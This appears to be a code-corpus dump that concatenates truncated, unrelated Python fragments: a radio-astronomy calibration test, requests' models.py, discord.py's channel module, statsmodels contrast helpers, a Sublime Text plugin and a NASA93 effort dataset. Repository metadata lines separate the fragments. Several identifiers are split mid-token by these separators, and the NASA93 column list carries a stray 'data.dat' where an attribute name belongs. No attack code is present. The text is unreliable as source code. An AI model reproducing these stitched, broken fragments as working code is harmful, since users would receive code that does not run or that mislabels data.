i_f = rand.randint(0, self.nfreq)
i_t = rand.randint(0, self.ntime)
i_p = rand.randint(0, 4)
self.data[i_t,i_p,i_f] += self.level[i_f] * 5
data, weights = p2s.separate_cal(self.data, self.n_bins_cal, flag=10)
right_answer = sp.empty((4, 2, self.nfreq))
right_answer[...] = self.dc
right_answer[0,0,:] += self.level
self.assertTrue(sp.allclose(data, right_answer, atol=self.level / 10))
self.assertTrue(sp.all(weights <= 1.))
kept_fraction = 1. - 4./self.n_bins_cal - (4./self.n_bins_cal/10)
self.assertTrue(sp.allclose(sp.mean(weights), kept_fraction, rtol=1e-3))
class TestSeparateCal(unittest.TestCase) :
"""Unlike the tests for get_cal_mask, these tests are tightly controled
with no noise so we can detect deviations from expected."""
def setUp(self) :
self.ntime = 2048
self.nfreq = 10
self.data = sp.zeros((self.ntime, 4, self.nfreq))
self.n_bins_cal = 64
self.offset = 10
def post_setup(self) :
if self.offset > self.n_bins_cal//2 :
last_on_start = (self.offset + self.n_bins_cal//2)% self.n_bins_cal
self.data[:last_on_start, :, :] = 1
for ii in range(self.ntime//self.n_bins_cal) :
s = slice(self.offset + ii*self.n_bins_cal, self.offset +
(2*ii+1)*self.n_bins_cal//2)
self.data[s, :, :] = 1
self.t_slice_on = slice(self.offset, sys.maxint, self.n_bins_cal)
self.t_slice_off = slice((self.offset +
self.n_bins_cal//2)%self.n_bins_cal,
sys.maxint, self.n_bins_cal)
def check_answer(self) :
data = self.data.copy()
outdata, weights = p2s.separate_cal(data, self.n_bins_cal, flag=-1)
self.assertTrue(sp.allclose(outdata[:,:,0,:], 1.0))
self.assertTrue(sp.allclose(outdata[:,:,1,:], 0.0))
data = self.data.copy()
outdata, weights = p2s.separate_cal(data, self.n_bins_cal, flag=10)
self.assertTrue(sp.allclose(outdata[:,:,0,:], 1.0))
self.assertTrue(sp.allclose(outdata[:,:,1,:], 0.0))
def test_works_no_transition(self) :
self.post_setup()
self.check_answer()
def test_works_transition(self) :
self.post_setup()
self.data[self.t_slice_off, :, :] = 0.3
self.data[self.t_slice_on, :, :] = 0.5
self.check_answer()
# Move the offset to the the second half and make sure it works.
def test_works_no_transition_late(self) :
self.offset = 57
self.post_setup()
self
|
samabhi/pstHealth
|
venv/lib/python2.7/site-packages/requests/models.py
|
Python
|
mit
| 26,299 | 0.001711 |
# -*- coding: utf-8 -*-
"""
requests.models
~~~~~~~~~~~~~~~
This module contains the primary objects that power Requests.
"""
import os
from datetime import datetime
from .hooks import dispatch_hook, HOOKS
from .structures import CaseInsensitiveDict
from .status_codes import codes
from .auth import HTTPBasicAuth, HTTPProxyAuth
from .packages.urllib3.response import HTTPResponse
from .packages.urllib3.exceptions import MaxRetryError
from .packages.urllib3.exceptions import SSLError as _SSLError
from .packages.urllib3.exceptions import HTTPError as _HTTPError
from .packages.urllib3 import connectionpool, poolmanager
from .packages.urllib3.filepost import encode_multipart_formdata
from .defaults import SCHEMAS
from .exceptions import (
ConnectionError, HTTPError, RequestException, Timeout, TooManyRedirects,
URLRequired, SSLError, MissingSchema, InvalidSchema)
from .utils import (
get_encoding_from_headers, stream_untransfer, guess_filename, requote_uri,
dict_from_string, stream_decode_response_unicode, get_netrc_auth)
from .compat import (
urlparse, urlunparse, urljoin, urlsplit, urlencode, str, bytes,
SimpleCookie, is_py2)
# Import chardet if it is available.
try:
import chardet
except ImportError:
pass
REDIRECT_STATI = (codes.moved, codes.found, codes.other, codes.temporary_moved)
class Request(object):
"""The :class:`Request <Request>` object. It carries out all functionality of
Requests. Recommended interface is with the Requests functions.
"""
def __init__(self,
url=None,
headers=dict(),
files=None,
method=None,
data=dict(),
params=dict(),
auth=None,
cookies=None,
timeout=None,
redirect=False,
allow_redirects=False,
proxies=None,
hooks=None,
config=None,
_poolmanager=None,
verify=None,
session=None,
cert=None):
#: Dictionary of configurations for this request.
self.config = dict(config or [])
#: Float describes the timeout of the request.
# (Use socket.setdefaulttimeout() as fallback)
self.timeout = timeout
#: Request URL.
self.url = url
#: Dictionary of HTTP Headers to attach to the :class:`Request <Request>`.
self.headers = dict(headers or [])
#: Dictionary of files to multipart upload (``{filename: content}``).
self.files = files
#: HTTP Method to use.
self.method = method
#: Dictionary or byte of request body data to attach to the
#: :class:`Request <Request>`.
self.data = None
#: Dictionary or byte of querystring data to attach to the
#: :class:`Request <Request>`.
self.params = None
#: True if :class:`Request <Request>` is part of a redirect chain (disables history
#: and HTTPError storage).
self.redirect = redirect
#: Set to True if full redirects are allowed (e.g. re-POST-ing of data at new ``
|
Location``)
self.allow_redirects = allow_redirects
# Dictionary mapping protocol to the URL of the proxy
|
(e.g. {'http': 'foo.bar:3128'})
self.proxies = dict(proxies or [])
# If no proxies are given, allow configuration by environment variables
# HTTP_PROXY and HTTPS_PROXY.
if not self.proxies and self.config.get('trust_env'):
if 'HTTP_PROXY' in os.environ:
self.proxies['http'] = os.environ['HTTP_PROXY']
if 'HTTPS_PROXY' in os.environ:
self.proxies['https'] = os.environ['HTTPS_PROXY']
self.data, self._enc_data = self._encode_params(data)
self.params, self._enc_params = self._encode_params(params)
#: :class:`Response <Response>` instance, containing
#: content and metadata of HTTP Response, once :attr:`sent <send>`.
self.response = Response()
#: Authentication tuple or object to attach to :class:`Request <Request>`.
self.auth = auth
#: CookieJar to attach to :class:`Request <Request>`.
self.cookies = dict(cookies or [])
#: True if Request has been sent.
self.sent = False
#: Event-handling hooks.
self.hooks = {}
for event in HOOKS:
self.hooks[event] = []
hooks = hooks or {}
for (k, v) in list(hooks.items()):
self.register_hook(event=k, hook=v)
#: Session.
self.session = session
#: SSL Verification.
self.verify = verify
#: SSL Certificate
self.cert = cert
if headers:
headers = CaseInsensitiveDict(self.headers)
else:
headers = CaseInsensitiveDict()
# Add configured base headers.
for (k, v) in list(self.config.get('base_headers', {}).items()):
if k not in headers:
headers[k] = v
self.headers = headers
self._poolmanager = _poolmanager
def __repr__(self):
return '<Request [%s]>' % (self.method)
def _build_response(self, resp):
"""Build internal :class:`Response <Response>` object
from given response.
"""
def build(resp):
response = Response()
# Pass settings over.
response.config = self.config
if resp:
# Fallback to None if there's no status_code, for whatever reason.
response.status_code = getattr(resp, 'status', None)
# Make headers case-insensitive.
response.headers = CaseInsensitiveDict(getattr(resp, 'headers', None))
# Set encoding.
response.encoding = get_encoding_from_headers(response.headers)
# Start off with our local cookies.
cookies = self.cookies or dict()
# Add new cookies from the server.
if 'set-cookie' in response.headers:
cookie_header = response.headers['set-cookie']
cookies = dict_from_string(cookie_header)
# Save cookies in Response.
response.cookies = cookies
# No exceptions were harmed in the making of this request.
response.error = getattr(resp, 'error', None)
# Save original response for later.
response.raw = resp
if isinstance(self.full_url, bytes):
response.url = self.full_url.decode('utf-8')
else:
response.url = self.full_url
return response
history = []
r = build(resp)
self.cookies.update(r.cookies)
if r.status_code in REDIRECT_STATI and not self.redirect:
while (('location' in r.headers) and
((r.status_code is codes.see_other) or (self.allow_redirects))):
r.content # Consume socket so it can be released
if not len(history) < self.config.get('max_redirects'):
raise TooManyRedirects()
# Release the connection back into the pool.
r.raw.release_conn()
history.append(r)
url = r.headers['location']
data = self.data
# Handle redirection without scheme (see: RFC 1808 Section 4)
if url.startswith('//'):
parsed_rurl = urlparse(r.url)
url = '%s:%s' % (parsed_rurl.scheme, url)
# Facilitate non-RFC2616-compliant 'location' headers
# (e.g. '/path/to/resource' instead of 'http://domain.tld/path/to/resource')
if not urlparse(url).netloc:
url = urljoin(r.url,
# Compliant with RFC3986, we percent
# encode the url.
requote_uri(url))
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.4
if r.status_code is codes.see_other:
method = 'GET'
data = None
|
jhgg/discord.py
|
discord/channel.py
|
Python
|
mit
| 12,385 | 0.001857 |
# -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2015-2016 Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import copy
from . import utils
from .permissions import Permissions
from .enums import ChannelType
from collections import namedtuple
from .mixins import Hashable
from .role import Role
from .member import Member
Overwrites = namedtuple('Overwrites', 'id allow deny type')
PermissionOverwrite = namedtuple('PermissionOverwrite', 'allow deny')
class Channel(Hashable):
"""Represents a Discord server channel.
Supported Operations:
+-----------+---------------------------------------+
| Operation | Description |
+===========+=======================================+
| x == y | Checks if two channels are equal. |
+-----------+---------------------------------------+
| x != y | Checks if two channels are not equal. |
+-----------+---------------------------------------+
| hash(x) | Returns the channel's hash. |
+-----------+---------------------------------------+
| str(x) | Returns the channel's name. |
+-----------+---------------------------------------+
Attributes
-----------
name : str
The channel name.
server : :class:`Server`
The server the channel belongs to.
id : str
The channel ID.
topic : Optional[str]
The channel's topic. None if it doesn't exist.
is_private : bool
``True`` if the channel is a private channel (i.e. PM). ``False`` in this case.
position : int
The position in the channel list. This is a number that starts at 0. e.g. the
top channel is position 0. The position varies depending on being a voice channel
or a text channel, so a 0 position voice channel is on top of the voice channel
list.
type : :class:`ChannelType`
The channel type. There is a chance that the type will be ``str`` if
the channel type is not within the ones recognised by the enumerator.
bit
|
rate : int
The channel's preferred audio bitrate in bits per second.
voice_members
A list of :class:`Members` that are currently inside this voice channel.
If :attr:`type` is not :attr:`ChannelType.voice` then this is always an empty array.
user_limit : int
The channel's limit for number o
|
f members that can be in a voice channel.
"""
__slots__ = [ 'voice_members', 'name', 'id', 'server', 'topic', 'position',
'is_private', 'type', 'bitrate', 'user_limit',
'_permission_overwrites' ]
def __init__(self, **kwargs):
self._update(**kwargs)
self.voice_members = []
def __str__(self):
return self.name
def _update(self, **kwargs):
self.name = kwargs.get('name')
self.server = kwargs.get('server')
self.id = kwargs.get('id')
self.topic = kwargs.get('topic')
self.is_private = False
self.position = kwargs.get('position')
self.bitrate = kwargs.get('bitrate')
self.type = kwargs.get('type')
self.user_limit = kwargs.get('user_limit')
try:
self.type = ChannelType(self.type)
except:
pass
self._permission_overwrites = []
everyone_index = 0
everyone_id = self.server.default_role.id
for index, overridden in enumerate(kwargs.get('permission_overwrites', [])):
overridden_id = overridden['id']
self._permission_overwrites.append(Overwrites(**overridden))
if overridden.get('type') == 'member':
continue
if overridden_id == everyone_id:
# the @everyone role is not guaranteed to be the first one
# in the list of permission overwrites, however the permission
# resolution code kind of requires that it is the first one in
# the list since it is special. So we need the index so we can
# swap it to be the first one.
everyone_index = index
# do the swap
tmp = self._permission_overwrites
if tmp:
tmp[everyone_index], tmp[0] = tmp[0], tmp[everyone_index]
@property
def changed_roles(self):
"""Returns a list of :class:`Roles` that have been overridden from
their default values in the :attr:`Server.roles` attribute."""
ret = []
for overwrite in filter(lambda o: o.type == 'role', self._permission_overwrites):
role = utils.get(self.server.roles, id=overwrite.id)
if role is None:
continue
role = copy.copy(role)
role.permissions.handle_overwrite(overwrite.allow, overwrite.deny)
ret.append(role)
return ret
@property
def is_default(self):
"""bool : Indicates if this is the default channel for the :class:`Server` it belongs to."""
return self.server.id == self.id
@property
def mention(self):
"""str : The string that allows you to mention the channel."""
return '<#{0.id}>'.format(self)
@property
def created_at(self):
"""Returns the channel's creation time in UTC."""
return utils.snowflake_time(self.id)
def overwrites_for(self, obj):
"""Returns a namedtuple that gives you the channel-specific overwrites
for a member or a role.
The named tuple is a tuple of (allow, deny) :class:`Permissions`
with the appropriately named entries.
Parameters
-----------
obj
The :class:`Role` or :class:`Member` or :class:`Object` denoting
whose overwrite to get.
"""
if isinstance(obj, Member):
predicate = lambda p: p.type == 'member'
elif isinstance(obj, Role):
predicate = lambda p: p.type == 'role'
else:
predicate = lambda p: True
for overwrite in filter(predicate, self._permission_overwrites):
if overwrite.id == obj.id:
return PermissionOverwrite(allow=Permissions(overwrite.allow),
deny=Permissions(overwrite.deny))
return PermissionOverwrite(allow=Permissions.none(), deny=Permissions.none())
def permissions_for(self, member):
"""Handles permission resolution for the current :class:`Member`.
This function takes into consideration the following cases:
- Server owner
- Server roles
- Channel overrides
- Member overrides
- Whether the channel is the default channel.
Parameters
----------
member : :class:`Member`
The member to resolve permissions for.
Returns
-------
:class:`Permissions`
The resolved permissions for the member.
"""
# The current cases can be explained as:
# Server owner get all permissions -- no questions asked. Otherwise...
# The @everyone role gets the first application.
# After that, the applied roles that the use
|
yarikoptic/pystatsmodels
|
statsmodels/sandbox/stats/contrast_tools.py
|
Python
|
bsd-3-clause
| 28,737 | 0.004941 |
'''functions to work with contrasts for multiple tests
contrast matrices for comparing all pairs, all levels to reference level, ...
extension to 2-way groups in progress
TwoWay: class for bringing two-way analysis together and try out
various helper functions
Idea for second part
- get all transformation matrices to move in between different full rank
parameterizations
- standardize to one parameterization to get all interesting effects.
- multivariate normal distribution
- exploit or expand what we have in LikelihoodResults, cov_params, f_test,
t_test, example: resols_dropf_full.cov_params(C2)
- connect to new multiple comparison for contrast matrices, based on
multivariate normal or t distribution (Hothorn, Bretz, Westfall)
'''
import numpy as np
#next 3 functions copied from multicomp.py
def contrast_allpairs(nm):
'''contrast or restriction matrix for all pairs of nm variables
Parameters
----------
nm : int
Returns
-------
contr : ndarray, 2d, (nm*(nm-1)/2, nm)
contrast matrix for all pairwise comparisons
'''
contr = []
for i in range(nm):
for j in range(i+1, nm):
contr_row = np.zeros(nm)
contr_row[i] = 1
contr_row[j] = -1
contr.append(contr_row)
return np.array(contr)
def contrast_all_one(nm):
'''contrast or restriction matrix for all against first comparison
Parameters
----------
nm : int
Returns
-------
contr : ndarray, 2d, (nm-1, nm)
contrast matrix for all against first comparisons
'''
contr = np.column_stack((np.ones(nm-1), -np.eye(nm-1)))
return contr
def contrast_diff_mean(nm):
'''contrast or restriction matrix for all against mean comparison
Parameters
----------
nm : int
Returns
-------
contr : ndarray, 2d, (nm-1, nm)
contrast matrix for all against mean comparisons
'''
return np.eye(nm) - np.ones((nm,nm))/nm
def signstr(x, noplus=False):
if x in [-1,0,1]:
if not noplus:
return '+' if np.sign(x)>=0 else '-'
else:
return '' if np.sign(x)>=0 else '-'
else:
return str(x)
def contrast_labels(contrasts, names, reverse=False):
if reverse:
sl = slice(None, None, -1)
else:
sl = slice(None)
labels = [''.join(['%s%s' % (signstr(c, noplus=True),v)
for c,v in zip(row, names)[sl] if c != 0])
for row in contrasts]
return labels
def contrast_product(names1, names2, intgroup1=None, intgroup2=None, pairs=False):
'''build contrast matrices for products of two categorical variables
this is an experimental script and should be converted to a class
Parameters
----------
names1, names2 : lists of strings
contains the list of level labels for each categorical variable
intgroup1, intgroup2 : ndarrays TODO: this part not tested, finished yet
categorical variable
Notes
-----
This creates a full rank matrix. It does not do all pairwise comparisons,
parameterization is using contrast_all_one to get differences with first
level.
? does contrast_all_pairs work as a plugin to get all pairs ?
'''
n1 = len(names1)
n2 = len(names2)
names_prod = ['%s_%s' % (i,j) for i in names1 for j in names2]
ee1 = np.zeros((1,n1))
ee1[0,0] = 1
if not pairs:
dd = np.r_[ee1, -contrast_all_one(n1)]
else:
dd = np.r_[ee1, -contrast_allpairs(n1)]
contrast_prod = np.kron(dd[1:], np.eye(n2))
names_contrast_prod0 = contrast_labels(contrast_prod, names_prod, reverse=True)
names_contrast_prod = [''.join(['%s%s' % (signstr(c, noplus=True),v)
for c,v in zip(row, names_prod)[::-1] if c != 0
|
])
for row in contrast_prod]
ee2 = np.zeros((1,n2))
ee2[0,0] = 1
#dd2 = np.r_[ee2, -contrast_all_one(n2)]
if not pairs:
dd2 = np.r_[ee2, -contrast_all_one(n2)]
else:
dd2 = np.r_[ee2, -contrast_allpairs(n2)]
contrast_prod2 = np.kron(np.eye(n1), dd2[1:])
names_contrast_prod2 = [''.join(['%s%s' % (signstr(c, noplus=Tru
|
e),v)
for c,v in zip(row, names_prod)[::-1] if c != 0])
for row in contrast_prod2]
if (not intgroup1 is None) and (not intgroup1 is None):
d1, _ = dummy_1d(intgroup1)
d2, _ = dummy_1d(intgroup2)
dummy = dummy_product(d1, d2)
else:
dummy = None
return (names_prod, contrast_prod, names_contrast_prod,
contrast_prod2, names_contrast_prod2, dummy)
def dummy_1d(x, varname=None):
'''dummy variable for id integer groups
Paramters
---------
x : ndarray, 1d
categorical variable, requires integers if varname is None
varname : string
name of the variable used in labels for category levels
Returns
-------
dummy : ndarray, 2d
array of dummy variables, one column for each level of the
category (full set)
labels : list of strings
labels for the columns, i.e. levels of each category
Notes
-----
use tools.categorical instead for more more options
See Also
--------
statsmodels.tools.categorical
Examples
--------
>>> x = np.array(['F', 'F', 'M', 'M', 'F', 'F', 'M', 'M', 'F', 'F', 'M', 'M'],
dtype='|S1')
>>> dummy_1d(x, varname='gender')
(array([[1, 0],
[1, 0],
[0, 1],
[0, 1],
[1, 0],
[1, 0],
[0, 1],
[0, 1],
[1, 0],
[1, 0],
[0, 1],
[0, 1]]), ['gender_F', 'gender_M'])
'''
if varname is None: #assumes integer
labels = ['level_%d' % i for i in range(x.max() + 1)]
return (x[:,None]==np.arange(x.max()+1)).astype(int), labels
else:
grouplabels = np.unique(x)
labels = [varname + '_%s' % str(i) for i in grouplabels]
return (x[:,None]==grouplabels).astype(int), labels
def dummy_product(d1, d2, method='full'):
'''dummy variable from product of two dummy variables
Parameters
----------
d1, d2 : ndarray
two dummy variables, assumes full set for methods 'drop-last'
and 'drop-first'
method : {'full', 'drop-last', 'drop-first'}
'full' returns the full product, encoding of intersection of
categories.
The drop methods provide a difference dummy encoding:
(constant, main effects, interaction effects). The first or last columns
of the dummy variable (i.e. levels) are dropped to get full rank
dummy matrix.
Returns
-------
dummy : ndarray
dummy variable for product, see method
'''
if method == 'full':
dd = (d1[:,:,None]*d2[:,None,:]).reshape(d1.shape[0],-1)
elif method == 'drop-last': #same as SAS transreg
d12rl = dummy_product(d1[:,:-1], d2[:,:-1])
dd = np.column_stack((np.ones(d1.shape[0], int), d1[:,:-1], d2[:,:-1],d12rl))
#Note: dtype int should preserve dtype of d1 and d2
elif method == 'drop-first':
d12r = dummy_product(d1[:,1:], d2[:,1:])
dd = np.column_stack((np.ones(d1.shape[0], int), d1[:,1:], d2[:,1:],d12r))
else:
raise ValueError('method not recognized')
return dd
def dummy_limits(d):
'''start and endpoints of groups in a sorted dummy variable array
helper function for nested categories
Examples
--------
>>> d1 = np.array([[1, 0, 0],
[1, 0, 0],
[1, 0, 0],
[1, 0, 0],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0],
[0, 0, 1],
[0, 0, 1],
[0, 0, 1],
[0, 0, 1]])
>>> dummy_limits(d1)
(array([0, 4, 8]), array([ 4, 8, 12]))
get group slices from an array
>>> [np.arange(d1.shape[0])[b:e]
|
Harrison-M/indent.txt-sublime
|
indentsublime.py
|
Python
|
mit
| 967 | 0.004137 |
import sublime, sublime_plugin
from indenttxt import indentparser
class IndentToList(sublime_plugin.TextCommand):
def run(self, edit):
parser = indentparser.IndentTxtParser()
#Get current selection
sels = self.view.sel()
selsParsed = 0
if(len(sels) > 0):
for sel in sels:
#Make sure selection isn't just a cursor
if(abs(sel.b - sel.a) > 0):
self.parseRegion(parser,
|
sel, edit)
selsParsed += 1
#All selections just cursor marks?
if(selsParsed == 0):
region = sublime.Region(0, self.view.size() - 1)
self.parseRegion(parser, region, edit)
def parseRegion(self, parser, region, edit):
lines = self.view.line(region)
text = self.view.substr(lines)
indented = parser.parseText(text)
newview = self.view.window(
|
).new_file()
newview.insert(edit, 0, indented)
|
rahlk/WarnPlan
|
warnplan/commons/tools/axe/nasa93.py
|
Python
|
mit
| 7,488 | 0.31437 |
"""
# The NASA93 Data Set
Standard header:
"""
from __future__ import division,print_function
import sys
sys.dont_write_bytecode = True
from lib import *
"""
data.dat:
"""
def nasa93():
vl=1;l=2;n=3;h=4;vh=5;xh=6
return data(indep= [
# 0..8
'Prec', 'Flex', 'Resl', 'Team', 'Pmat', 'rely', 'data.dat', 'cplx', 'ruse',
# 9 .. 17
'docu', 'time', 'stor', 'pvol', 'acap', 'pcap', 'pcon', 'aexp', 'plex',
# 18 .. 25
'ltex', 'tool', 'site', 'sced', 'kloc'],
less = ['effort', 'defects', 'months'],
_rows=[
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,25.9,117.6,808,15.3],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,24.6,117.6,767,15.0],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,7.7,31.2,240,10.1],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,8.2,36,256,10.4],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,9.7,25.2,302,11.0],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,2.2,8.4,69,6.6],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,3.5,10.8,109,7.8],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,66.6,352.8,2077,21.0],
[h,h,h,vh,h,h,l,h,n,n,xh,xh,l,h,h,n,h,n,h,h,n,n,7.5,72,226,13.6],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,h,vh,n,vh,n,h,n,n,n,20,72,566,14.4],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,h,h,n,vh,n,h,n,n,n,6,24,188,9.9],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,h,vh,n,vh,n,h,n,n,n,100,360,2832,25.2],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,h,n,n,vh,n,l,n,n,n,11.3,36,456,12.8],
[h,h,h,vh,n,n,l,h,n,n,n,n,h,h,h,n,h,l,vl,n,n,n,100,215,5434,30.1],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,h,h,n,vh,n,h,n,n,n,20,48,626,15.1],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,h,n,n,n,n,vl,n,n,n,100,360,4342,28.0],
[h,h,h,vh,n,n,l,h,n,n,n,xh,l,h,vh,n,vh,n,h,n,n,n,150,324,4868,32.5],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,h,h,n,h,n,h,n,n,n,31.5,60,986,17.6],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,h,h,n,vh,n,h,n,n,n,15,48,470,13.6],
[h,h,h,vh,n,n,l,h,n,n,n,xh,l,h,n,n,h,n,h,n,n,n,32.5,60,1276,20.8],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,19.7,60,614,13.9],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,66.6,300,2077,21.0],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,29.5,120,920,16.0],
[h,h,h,vh,n,h,n,n,n,n,h,n,n,n,h,n,h,n,n,n,n,n,15,90,575,15.2],
[h,h,h,vh,n,h,n,h,n,n,n,n,n,n,h,n,h,n,n,n,n,n,38,210,1553,21.3],
[h,h,h,vh,n,n,n,n,n,n,n,n,n,n,h,n,h,n,n,n,n,n,10,48,427,12.4],
[h,h,h,vh,h,n,vh,h,n,n,vh,vh,l,vh,n,n,h,l,h,n,n,l,15.4,70,765,14.5],
[h,h,h,vh,h,n,vh,h,n,n,vh,vh,l,vh,n,n,h,l,h,n,n,l,48.5,239,2409,21.4],
[h,h,h,vh,h,n,vh,h,n,n,vh,vh,l,vh,n,n,h,l,h,n,n,l,16.3,82,810,14.8],
[h,h,h,vh,h,n,vh,h,n,n,vh,vh,l,vh,n,n,h,l,h,n,n,l,12.8,62,636,13.6],
[h,h,h,vh,h,n,vh,h,n,n,vh,vh,l,vh,n,n,h,l,h,n,n,l,32.6,170,1619,18.7],
[h,h,h,vh,h,n,vh,h,n,n,vh,vh,l,vh,n,n,h,l,h,n,n,l,35.5,192,1763,19.3],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,5.5,18,172,9.1],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,10.4,50,324,11.2],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,14,60,437,12.4],
[h,h,h,vh,n,h,n,h,n,n,n,n,n,n,n,n,n,n,n,n,n,n,6.5,42,290,12.0],
[h,h,h,vh,n,n,n,h,n,n,n,n,n,n,n,n,n,n,n,n,n,n,13,60,683,14.8],
[h,h,h,vh,h,n,n,h,n,n,n,n,n,n,h,n,n,n,h,h,n,n,90,444,3343,26.7],
[h,h,h,vh,n,n,n,h,n,n,n,n,n,n,n,n,n,n,n,n,n,n,8,42,420,12.5],
[h,h,h,vh,n,n,n,h,n,n,h,n,n,n,n,n,n,n,n,n,n,n,16,114,887,16.4],
[h,h,h,vh,h,n,h,h,n,n,vh,h,l,h,h,n,n,l,h,n,n,l,177.9,1248,7998,31.5],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,h,n,n,n,n,n,n,n,302,2400,8543,38.4],
[h,h,h,vh,h,n,h,l,n,n,n,n,h,h,n,n,h,n,n,h,n,n,282.1,1368,9820,37.3],
[h,h,h,vh,h,h,h,l,n,n,n,n,n,h,n,n,h,n,n,n,n,n,284.7,973,8518,38.1],
[h,h,h,vh,n,h,h,n,n,n,n,n,l,n,h,n,h,n,h,n,n,n,79,400,2327,26.9],
[h,h,h,vh,l,l,n,n,n,n,n,n,l,h,vh,n,h,n,h,n,n,n,423,2400,18447,41.9],
[h,h,h,vh,h,n,n,n,n,n,n,n,l,h,vh,n,vh,l,h,n,n,n,190,420,5092,30.3],
[h,h,h,vh,h,n,n,h,n,n,n,h,n,h,n,n,h,n,h,n,n,n,47.5,252,2007,22.3],
[h,h,h,vh,l,vh,n,xh,n,n,h,h,l,n,n,n,h,n,n,h,n,n,21,107,1058,21.3],
[h,h,h,vh,l,n,h,h,n,n,vh,n,n,h,h,n,h,n,h,n,n,n,78,571.4,4815,30.5],
[h,h,h,vh,l,n,h,h,n,n,vh,n,n,h,h,n,h,n,h,n,n,n,11.4,98.8,704,15.5],
[h,h,h,vh,l,n,h,h,n,n,vh,n,n,h,h,n,h,n,h,n,n,n,19.3,155,1191,18.6],
[h,h,h,vh,l,h,n,vh,n,n,h,h,l,h,n,n,n,h,h,n,n,n,101,750,4840,32.4],
[h,h,h,vh,l,h,n,h,n,n,h,h,l,n,n,n,h,n,n,n,n,n,219,2120,11761,42.8],
[h,h,h,vh,l,h,n,h,n,n,h,h,l,n,n,n,h,n,n,n,n,n,50,370,2685,25.4],
[h,h,h,vh,h,vh,h,h,n,n,vh,vh,n,vh,vh,n,vh,n,h,h,n,l,227,1181,6293,33.8],
[h,h,h,vh,h,n,h,vh,n,n,n,n,l,h,vh,n,n,l,n,n,n,l,70,278,2950,20.2],
[h,h,h,vh,h,h,l,h,n,n,n,n,l,n,n,n,n,n,h,n,n,l,0.9,8.4,28,4.9],
[h,h,h,vh,l,vh,l,xh,n,n,xh,vh,l,h,h,n,vh,vl,h,n,n,n,980,4560,50961,96.4],
[h,h,h,vh,n,n,l,h,n,n,n,n,l,vh,vh,n,n,h,h,n,n,n,350,720,8547,35.7],
[h,h,h,vh,h,h,n,xh,n,n,h,h,l,h,n,n,n,h,h,h,n,n,70,458,2404,27.5],
[h,h,h,vh,h,h,n,xh,n,n,h,h,l,h,n,n,n,h,h,h,n,n,271,2460,9308,43.4],
[h,h,h,vh,n,n,n,n,n,n,n,n,l,h,h,n,h,n,h,n,n,n,90,162,2743,25.0],
[h,h,h,vh,n,n,n,n,n,n,n,n,l,h,h,n,h,n,h,n,n,n,40,150,1219,18.9],
[h,h,h,vh,n,h,n,h,n,n,h,n,l,h,h,n,h,n,h,n,n,n,137,636,4210,32.2],
[h,h,h,vh,n,h,n,h,n,n,h,n,h,h,h,n,h,n,h,n,n,n,150,882,5848,36.2],
[h,h,h,vh,n,vh,n,h,n,n,h
|
,n,l,h,h,n,h,n,h,n,n,n,339,444,8477,45.9],
[h,h,h,vh,n,l,h,l,n,n,n,n,h,h,h,n,h,n,h,n,n,n,240,192,10313,37.1],
[h,h,h,vh,l,h,n,h,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,144,576,6129,28.8],
[h,h,h,vh,l,n,l,n,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,151,432,6136,26.2],
[h,h,h,vh,l,n,l,h,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,34,72,1555,16.2],
[h,h,h,vh,l,n,n,h,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,98,300,4907,24.4],
[h,h,h,vh,l,n,n,h,n,n,
|
n,vh,l,h,h,n,h,h,h,n,n,l,85,300,4256,23.2],
[h,h,h,vh,l,n,l,n,n,n,n,vh,l,h,h,n,h,h,h,n,n,l,20,240,813,12.8],
